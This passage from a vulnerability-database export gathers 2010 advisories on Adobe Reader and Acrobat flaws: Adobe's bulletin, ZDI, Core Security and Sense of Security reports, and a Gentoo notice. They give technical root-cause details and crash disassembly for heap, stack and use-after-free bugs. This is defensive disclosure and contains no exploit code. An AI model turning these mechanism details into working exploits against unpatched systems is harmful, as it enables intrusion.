12, 2010. The next\r\nquarterly security updates for Adobe Reader and Acrobat are scheduled for February 8, 2011.\r\nAffected software versions\r\n\r\n * Adobe Reader 9.3.4 and earlier versions for Windows, Macintosh and UNIX\r\n * Adobe Acrobat 9.3.4 and earlier versions for Windows and Macintosh\r\n\r\nSOLUTION\r\n\r\nAdobe recommends users update their software installations by following the instructions below:\r\n\r\nAdobe Reader\r\nUsers on Windows and Macintosh can utilize the product's update mechanism. The default\r\nconfiguration is set to run automatic update checks on a regular schedule and can be manually\r\nactivated by choosing Help > Check for Updates.\r\n\r\nAdobe Reader users on Windows can also find the appropriate update here:\r\nhttp://get.adobe.com/reader/.\r\n\r\nAdobe Reader users on Macintosh can also find the appropriate update here:\r\nhttp://get.adobe.com/reader/.\r\n\r\nAdobe Reader users on UNIX can find the appropriate update here:*\r\nftp://ftp.adobe.com/pub/adobe/reader/unix/9.x/9.4.0.\r\n*Note: Adobe Reader 9.4 for UNIX will be available from the Adobe Reader Download Center at\r\nhttp://get.adobe.com/reader/ by October 21, 2010.\r\n\r\nAdobe Acrobat\r\nUsers can utilize the product's update mechanism. The default configuration is set to run\r\nautomatic update checks on a regular schedule and can be manually activated by choosing Help >\r\nCheck for Updates.\r\n\r\nAcrobat Standard and Pro users on Windows can also find the appropriate update here:\r\nhttp://www.adobe.com/support/downloads/product.jsp?product=1&platform=Windows.\r\n\r\nAcrobat Pro Extended users on Windows can also find the appropriate update here:\r\nhttp://www.adobe.com/support/downloads/product.jsp?product=158&platform=Windows.\r\n\r\nAcrobat 3D users on Windows can also find the appropriate update here:\r\nhttp://www.adobe.com/support/downloads/product.jsp?product=112&platform=Windows.\r\n\r\nAcrobat Pro users on Macintosh can also find the appropriate update here:\r\nhttp://www.adobe.com/support/downloads/product.jsp?product=1&platform=Macintosh.\r\nSeverity rating\r\n\r\nAdobe categorizes these as critical updates and recommends that users apply the latest updates\r\nfor their product installations by following the instructions in the "Solution" section above.\r\nDETAILS\r\n\r\nCritical vulnerabilities have been identified in Adobe Reader 9.3.4 (and earlier versions) for\r\nWindows, Macintosh and UNIX, Adobe Acrobat 9.3.4 (and earlier versions) for Windows and\r\nMacintosh, and Adobe Reader 8.2.4 (and earlier versions) and Adobe Acrobat 8.2.4 (and earlier\r\nversions) for Windows and Macintosh. These vulnerabilities, including CVE-2010-2883,\r\nreferenced in Security Advisory APSA10-02, and CVE-2010-2884 referenced in the Adobe Flash\r\nPlayer Security Bulletin APSB10-22, could cause the application to crash and could potentially\r\nallow an attacker to take control of the affected system.\r\n\r\nAdobe recommends users of Adobe Reader 9.3.4 and earlier versions for Windows, Macintosh\r\nand UNIX update to Adobe Reader 9.4. (For Adobe Reader users on Windows and Macintosh,\r\nwho cannot update to Adobe Reader 9.4, Adobe has provided the Adobe Reader 8.2.5 update.)\r\nAdobe recommends users of Adobe Acrobat 9.3.4 and earlier versions for Windows and\r\nMacintosh update to Adobe Acrobat 9.4. Adobe recommends users of Adobe Acrobat 8.2.4 and\r\nearlier versions for Windows and Macintosh update to Adobe Acrobat 8.2.5.\r\n\r\nThis update resolves a font-parsing input validation vulnerability that could lead to code\r\nexecution (CVE-2010-2883).\r\nNote: There are reports that this issue is being actively exploited in the wild.\r\n\r\nThis update resolves a memory corruption vulnerability in the authplay.dll component that could\r\nlead to code execution (CVE-2010-2884).\r\n\r\nThis update resolves multiple potential Linux-only privilege escalation issues (CVE-2010-2887).\r\n\r\nThis update resolves multiple input validation errors that could lead to code execution (Windows,\r\nActiveX only) (CVE-2010-2888).\r\n\r\nThis update resolves a font-parsing input validation vulnerability that could lead to code\r\nexecution (CVE-2010-2889).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution\r\n(CVE-2010-2890).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution\r\n(CVE-2010-3619).\r\n\r\nThis update resolves an image-parsing input validation vulnerability that could lead to code\r\nexecution (CVE-2010-3620).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution\r\n(CVE-2010-3621).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution\r\n(CVE-2010-3622).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution\r\n(Macintosh platform only) (CVE-2010-3623).\r\n\r\nThis update resolves an image-parsing input validation vulnerability that could lead to code\r\nexecution (Macintosh platform only) (CVE-2010-3624).\r\n\r\nThis update resolves a prefix protocol handler vulnerability that could lead to code execution\r\n(CVE-2010-3625).\r\n\r\nThis update resolves a font-parsing input validation vulnerability that could lead to code\r\nexecution (CVE-2010-3626).\r\n\r\nThis update resolves an input validation vulnerability that could lead to code execution\r\n(CVE-2010-3627).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution\r\n(CVE-2010-3628).\r\n\r\nThis update resolves an image-parsing input validation vulnerability that could lead to code\r\nexecution (CVE-2010-3629).\r\n\r\nThis update resolves a denial of service vulnerability; arbitrary code execution has not been\r\ndemonstrated, but may be possible (CVE-2010-3630).\r\n\r\nThis update resolves an array-indexing vulnerability that could lead to code execution\r\n(Macintosh platform only) (CVE-2010-3631).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution\r\n(CVE-2010-3632).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution\r\n(CVE-2010-3658)\r\n\r\nThis update resolves a denial of service issue (CVE-2010-3656).\r\n\r\nThis update resolves a denial of service issue (CVE-2010-3657).\r\nACKNOWLEDGMENTS\r\n\r\nAdobe would like to thank the following individuals and organizations for reporting the relevant\r\nissues and for working with Adobe to help protect our customers:\r\n\r\n * Report submitted by Red Hat Security Response Team (CVE-2010-2887)\r\n * Tavis Ormandy of the Google Security Team (CVE-2010-2888, CVE-2010-2889, CVE-2010-2890, CVE-2010-3619, CVE-2010-3620, CVE-2010-3626, CVE-2010-3658)\r\n * Sebastian Apelt through TippingPoint's Zero Day Initiative (CVE-2010-3621, CVE-2010-3622)\r\n * James Quirk of Los Alamos, New Mexico (CVE-2010-3623)\r\n * Felipe Andres Manzano through the iSIGHT Partners Global Vulnerability Partnership (CVE-2010-3624)\r\n * Billy Rios from the Google Security Team (CVE-2010-3625)\r\n * Ricardo Narvaja of Core Security Technologies (CVE-2010-3627)\r\n * Bing Liu of Fortinet's FortiGuard Labs (CVE-2010-3628)\r\n * Will Dormann of CERT (CVE-2010-3629)\r\n * Brett Gervasoni of Sense of Security (CVE-2010-3630)\r\n * Knud Erik Højgaard of nSense Vulnerability Research Team (CVE-2010-3631)\r\n * An anonymous reporter through TippingPoint's Zero Day Initiative (CVE-2010-3632)\r\n\r\n", "edition": 1, "modified": "2010-10-06T00:00:00", "published": "2010-10-06T00:00:00", "id": "SECURITYVULNS:DOC:24840", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24840", "title": "Security updates available for Adobe Reader and Acrobat", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:38", "bulletinFamily": "software", "cvelist": ["CVE-2010-2887", "CVE-2010-3621", "CVE-2010-2890", "CVE-2010-3658", "CVE-2010-2884", "CVE-2010-2883", "CVE-2010-3624", "CVE-2010-3630", "CVE-2010-3629", "CVE-2010-3657", "CVE-2010-3622", "CVE-2010-2889", "CVE-2010-3625", "CVE-2010-3620", "CVE-2010-3656", "CVE-2010-3619", "CVE-2010-3626", "CVE-2010-2888", "CVE-2010-3623", "CVE-2010-3631", "CVE-2010-3628", "CVE-2010-3632", "CVE-2010-3627"], "description": "Multiple memory corruptions, code executions, privilege escalations, shell character vulnerabilities.", "edition": 1, "modified": "2010-10-08T00:00:00", "published": "2010-10-08T00:00:00", "id": "SECURITYVULNS:VULN:11180", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11180", "title": "Adobe Acrobat / Reader multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-3622"], "description": "ZDI-10-192: Adobe Acrobat Reader ICC mluc Remote Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-192\r\nOctober 6, 2010\r\n\r\n-- CVE ID:\r\nCVE-2010-3622\r\n\r\n-- CVSS:\r\n10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)\r\n\r\n-- Affected Vendors:\r\nAdobe\r\n\r\n-- Affected Products:\r\nAdobe Reader\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Adobe Reader. User interaction is required\r\nin that a target must be coerced into opening a file or visiting a web\r\npage.\r\n\r\nThe specific flaw exists within the ACE.dll module responsible for\r\nparsing ICC streams. Within the 'desc' tag there exists an embedded\r\n'mluc' data structure. The code within ACE performs arithmetic on the\r\nsecond DWORD from the mluc structure and a value from the desc\r\nstructure. The resulting integer is used for an allocation of a\r\nheap-based buffer. An attacker can forge these values to force the\r\nprocess to under-allocate this buffer and later overflow it during a\r\ncopy operation. This leads to remote code execution under the context of\r\nthe user running the application.\r\n\r\n-- Vendor Response:\r\nAdobe has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://www.adobe.com/support/security/bulletins/apsb10-21.html\r\n\r\n-- Disclosure Timeline:\r\n2010-06-23 - Vulnerability reported to vendor\r\n2010-10-06 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Sebastian Apelt (www.siberas.de)\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "edition": 1, "modified": "2010-10-06T00:00:00", "published": "2010-10-06T00:00:00", "id": "SECURITYVULNS:DOC:24843", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24843", "title": "ZDI-10-192: Adobe Acrobat Reader ICC mluc Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-3630"], "description": "Adobe Reader 9.3.4 Multiple Memory Corruption - Security Advisory - SOS-10-003\r\n\r\nRelease Date. 6-Oct-2010\r\nLast Update. -\r\nVendor Notification Date. 26-Jul-2010\r\nProduct. Adobe Reader\r\n Adobe Acrobat\r\nPlatform. Microsoft Windows\r\nAffected versions. 9.3.4 verified and \r\n possibly others.\r\nSeverity Rating. Medium\r\nImpact. Denial of service, potentially\r\n code execution.\r\nAttack Vector. Local system\r\nSolution Status. Upgrade to 9.4 (as advised by\r\n Adobe)\r\nCVE reference. CVE-2010-3630\r\n\r\nDetails.\r\nAdobe Reader is a popular freeware PDF viewer. Version 9.3.4 of\r\nthe application is vulnerable to multiple memory corruption \r\nvulnerabilities. By sending specially crafted PDF files it is\r\npossible to cause memory corruption in the 3difr and\r\nAcroRd32.dll modules. Both issues trigger a null pointer\r\ncondition which results in an access violation. The issue in\r\nAcroRd32.dll is triggered when Adobe Reader is closed.\r\n\r\nFunction sub_60AF56 in AcroRd32.dll access violates when\r\nattempting to read data pointed to by the ESI register. Part\r\ndisassembly of the function is shown below:\r\n\r\npush ebp\r\nmov ebp, esp\r\nsub esp, 1Ch\r\nand [ebp+var_4], 0 \r\npush ebx\r\npush esi\r\nmov esi, ecx\r\nmov ebx, [esi+23Ch] <-- crash\r\n\r\nFunction sub_1000EEE0 in 3difr also access violates when\r\nattempting to read data pointed to by the ECX register. Part \r\ndisassembly of the function is shown below:\r\n\r\nmov ecx, [eax+4]\r\nmov eax, [edx+4]\r\nmov dx, [eax]\r\ncmp dx, [ecx] <-- crash\r\njnz short loc_1000EF87\r\n\r\nIt may be possible to exploit these vulnerabilities to execute\r\narbitrary code under the context of the user running Adobe\r\nReader.\r\n\r\nProof of Concept.\r\nProof of concept PDF files are available to Sense of Security\r\ncustomers upon request.\r\n\r\nSolution.\r\nA patch is available from Adobe and is included in the next\r\nrelease (9.4).\r\n\r\nDiscovered by.\r\nBrett Gervasoni from Sense of Security Labs.\r\n\r\nAbout us.\r\nSense of Security is a leading provider of information\r\nsecurity and risk management solutions. Our team has expert\r\nskills in assessment and assurance, strategy and architecture,\r\nand deployment through to ongoing management. We are\r\nAustralia's premier application penetration testing firm and\r\ntrusted IT security advisor to many of the countries largest\r\norganisations.\r\n\r\nSense of Security Pty Ltd \r\nLevel 8, 66 King St\r\nSydney NSW 2000\r\nAUSTRALIA\r\n\r\nT: +61 (0)2 9290 4444\r\nF: +61 (0)2 9290 4455\r\nW: http://www.senseofsecurity.com.au/consulting/penetration-testing\r\nE: info@senseofsecurity.com.au\r\nTwitter: @ITsecurityAU\r\n\r\nThe latest version of this advisory can be found at:\r\nhttp://www.senseofsecurity.com.au/advisories/SOS-10-003.pdf", "edition": 1, "modified": "2010-10-08T00:00:00", "published": "2010-10-08T00:00:00", "id": "SECURITYVULNS:DOC:24856", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24856", "title": "Adobe Reader 9.3.4 Multiple Memory Corruption - Security Advisory - SOS-10-003", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-3632"], "description": "ZDI-10-193: Adobe Acrobat Reader Multimedia Playing Remote Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-193\r\nOctober 6, 2010\r\n\r\n-- CVE ID:\r\nCVE-2010-3632\r\n\r\n-- CVSS:\r\n9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)\r\n\r\n-- Affected Vendors:\r\nAdobe\r\n\r\n-- Affected Products:\r\nAdobe Acrobat\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 10538. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Adobe Acrobat Reader. User interaction is\r\nrequired to exploit this vulnerability in that the target must visit a\r\nmalicious page or open a malicious file.\r\n\r\nThe specific flaw exists within the application explicitly trusting a\r\nstring's length embedded within a particular file format. The\r\napplication will duplicate an arbitrarily sized string into a statically\r\nsized buffer located on the stack. This can lead to code execution under\r\nthe context of the application.\r\n\r\n-- Vendor Response:\r\nAdobe has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://www.adobe.com/support/security/bulletins/apsb10-21.html\r\n\r\n-- Disclosure Timeline:\r\n2010-08-25 - Vulnerability reported to vendor\r\n2010-10-06 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Anonymous\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "edition": 1, "modified": "2010-10-06T00:00:00", "published": "2010-10-06T00:00:00", "id": "SECURITYVULNS:DOC:24844", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24844", "title": "ZDI-10-193: Adobe Acrobat Reader Multimedia Playing Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-3621"], "description": "ZDI-10-191: Adobe Reader ICC Parsing Remote Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-191\r\nOctober 6, 2010\r\n\r\n-- CVE ID:\r\nCVE-2010-3621\r\n\r\n-- CVSS:\r\n9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)\r\n\r\n-- Affected Vendors:\r\nAdobe\r\n\r\n-- Affected Products:\r\nAdobe Reader\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Adobe Reader. User interaction is required\r\nin that a target must be coerced into opening a file or visiting a web\r\npage.\r\n\r\nThe specific flaw exists within the ACE.dll module responsible for\r\nparsing ICC streams. When processing an ICC stream, the process performs\r\nmath on two DWORD values from the input file. If these values wrap over\r\nthe maximum integer value of 0xFFFFFFFF a mis-allocation can occur.\r\nLater, the process uses one of the original DWORD values as a size to a\r\ncopy function. This can be abused by an attacker to overflow a stack\r\nbuffer and subsequently execute code under the context of the user\r\nrunning the process.\r\n\r\n-- Vendor Response:\r\nAdobe has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://www.adobe.com/support/security/bulletins/apsb10-21.html\r\n\r\n-- Disclosure Timeline:\r\n2010-06-23 - Vulnerability reported to vendor\r\n2010-10-06 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Sebastian Apelt (www.siberas.de)\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "edition": 1, "modified": "2010-10-06T00:00:00", "published": "2010-10-06T00:00:00", "id": "SECURITYVULNS:DOC:24852", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24852", "title": "ZDI-10-191: Adobe Reader ICC Parsing Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-3627"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - CoreLabs Advisory\r\n http://corelabs.coresecurity.com/\r\n\r\nAdobe Acrobat Reader Acrord32.dll Use After Free Vulnerability\r\n\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Adobe Acrobat Reader Acrord32.dll Use After Free Vulnerability\r\nAdvisory Id: CORE-2010-0701\r\nAdvisory URL:\r\n[http://www.coresecurity.com/content/adobe-acrobat-acrord23-reader-use-after-free]\r\nDate published: 2010-10-05\r\nDate of last update: 2010-10-05\r\nVendors contacted: Adobe\r\nRelease mode: Coordinated release\r\n\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Use after free [CWE-416]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes (client-side)\r\nLocally Exploitable: No\r\nCVE Name: CVE-2010-3627\r\nBugtraq ID: N/A\r\n\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nAdobe Acrobat Reader is prone to a use-after-free vulnerability due to\r\nan invalid usage of a released memory chunk. This vulnerability could be\r\nused by a remote attacker to execute arbitrary code, by enticing the\r\nuser of Adobe Acrobat Reader to open a specially crafted file and click\r\non PAGES thumbnails.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . Adobe Acrobat Reader 9.x\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . Adobe Acrobat Reader 8.x\r\n\r\n\r\n6. *Solutions and Workarounds*\r\n\r\nFor further information about this issue look at the Adobe Security\r\nBulletin and security blogs:\r\n\r\n . Adobe Security Bulletins and Advisories:\r\n[http://www.adobe.com/support/security].\r\n . PSIRT blog: [http://blogs.adobe.com/psirt].\r\n\r\n\r\n7. *Credits*\r\n\r\nThis vulnerability was discovered and researched by Ricardo Narvaja,\r\nfrom Core Security Technologies. This publication was coordinated by\r\nFernando Russ.\r\n\r\n\r\n8. *Technical Description*\r\n\r\nAdobe Acrobat Reader is prone to a use-after-free vulnerability due to\r\nan invalid usage of a released memory chunk. A specially crafted '.pdf'\r\nfile containing special flash code triggers an 'ACCESS_VIOLATION'\r\nreading at address 0x00000030.\r\n\r\nA more careful analysis of that code indicates that ESI points to a\r\nreleased chunk of memory. Exploitation is feasible forcing the\r\nallocation process of Adobe Acrobat Reader to reuse the chunk pointed by\r\nESI with specially controlled data.\r\n\r\n/-----\r\n00EE10F8 MOV ECX,DWORD PTR DS:[ESI+1C] <-- ESI points to a\r\npreviously released memory chunk.\r\n00EE10FB MOV DWORD PTR SS:[EBP+78],EAX\r\n00EE10FE MOV EAX,DWORD PTR DS:[ESI+18]\r\n00EE1101 PUSH EAX\r\n00EE1102 CALL DWORD PTR DS:[ECX+30] <-- The execution flow\r\ndepends on the content of ECX. (ECX dependes on ESI)\r\n\r\n- -----/\r\n The content of the CPU register while an 'ACCESS_VIOLATION' reading was\r\ntriggered at 0x00EE1102,\r\n\r\n/-----\r\n\r\nEAX 00000000\r\nECX 00000000\r\nEDX 014D0A40\r\nEBX 00000000\r\nESP 0013F1BC\r\nEBP 0013F24C\r\nESI 02D5782C\r\nEDI 10A7C3D0\r\nEIP 00EE1102\r\n\r\n- -----/\r\n This vulnerability could result in arbitrary code execution, although\r\nit was not verified.\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2010-07-05:\r\nCore Security Technologies notifies the Adobe team of the vulnerability\r\nand announces its initial plan to publish the advisory on July 26th,\r\n2010. A Proof of Concept (PoC) was sent to Adobe team.\r\n\r\n. 2010-07-06:\r\nAdobe team acknowledges Core Security Technologies' e-mail. Vendor also\r\nnotifies that their world-wide offices will be shut down from July 5th\r\nto July 11th, and it may take a bit longer than usual to investigate\r\nthis issue.\r\n\r\n. 2010-07-22:\r\nCore asks for a status update about this issue.\r\n\r\n. 2010-07-22:\r\nAdobe team notifies that they have reproduced the issue and expect the\r\nfix to be available in the next quarterly security update for Acrobat\r\nand Adobe Reader. These fixes are currently scheduled for an October\r\npatch Tuesday release.\r\n\r\n. 2010-07-26:\r\nCore notifies that the publication date for this advisory was\r\nre-scheduled to October 12th, 2010.\r\n\r\n. 2010-07-27:\r\nCore notifies that the publication date of October 12th, 2010 should be\r\nconsidered as final. If Adobe team does not release a patch on that day,\r\nCore will be forced to release this advisory in user-release mode.\r\n\r\n. 2010-09-28:\r\nCore notifies that the publication date of October 12th, 2010 is still\r\nvalid and asks for a status update.\r\n\r\n. 2010-09-29:\r\nAdobe acknowledges the communication by informing that the publication\r\ndate was re-scheduled to October 5th, 2010.\r\n\r\n. 2010-10-04:\r\nCore asks if the Adobe team has an assigned CVE identifier for this\r\nvulnerability and which are the affected versions of Adobe Reader.\r\n\r\n. 2010-10-04:\r\nAdobe notifies that:\r\n\r\n . This issue affects Reader 9.x, but not Reader 8.x.\r\n . The assigned identifier for this vulnerability is CVE-2010-3627.\r\n\r\n. 2010-10-05:\r\nCore publishes advisory CORE-2010-0701.\r\n\r\n\r\n\r\n10. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\n[http://www.coresecurity.com/corelabs].\r\n\r\n\r\n11. *About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\n[http://www.coresecurity.com].\r\n\r\n\r\n12. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2010 Core Security\r\nTechnologies and (c) 2010 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]\r\n\r\n\r\n13. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\n[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.12 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/\r\n\r\niEYEARECAAYFAkystXYACgkQyNibggitWa33EQCfT55LUL5PG2WUscpSikemiVeY\r\nyNMAnjhSH0EitGnENPDAbWJz3+JiZXPh\r\n=nN2s\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2010-10-06T00:00:00", "published": "2010-10-06T00:00:00", "id": "SECURITYVULNS:DOC:24842", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24842", "title": "(CORE-2010-0701) Adobe Acrobat Reader Acrord32.dll Use After Free Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:39", "bulletinFamily": "unix", "cvelist": ["CVE-2010-4091", "CVE-2010-2887", "CVE-2010-3654", "CVE-2010-3621", "CVE-2010-2890", "CVE-2010-3658", "CVE-2010-2884", "CVE-2010-2883", "CVE-2010-3630", "CVE-2010-3629", "CVE-2010-3657", "CVE-2010-3622", "CVE-2010-2889", "CVE-2010-3625", "CVE-2010-3620", "CVE-2010-3656", "CVE-2010-3619", "CVE-2010-3626", "CVE-2010-3628", "CVE-2010-3632", "CVE-2010-3627"], "edition": 1, "description": "### Background\n\nAdobe Reader (formerly Adobe Acrobat Reader) is a closed-source PDF reader. \n\n### Description\n\nMultiple vulnerabilities were discovered in Adobe Reader. For further information please consult the CVE entries and the Adobe Security Bulletins referenced below. \n\n### Impact\n\nA remote attacker might entice a user to open a specially crafted PDF file, possibly resulting in the execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Adobe Reader users should upgrade to the latest stable version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-text/acroread-9.4.1\"", "modified": "2011-01-21T00:00:00", "published": "2011-01-21T00:00:00", "id": "GLSA-201101-08", "href": "https://security.gentoo.org/glsa/201101-08", "type": "gentoo", "title": "Adobe Reader: Multiple vulnerabilities", "cvss": 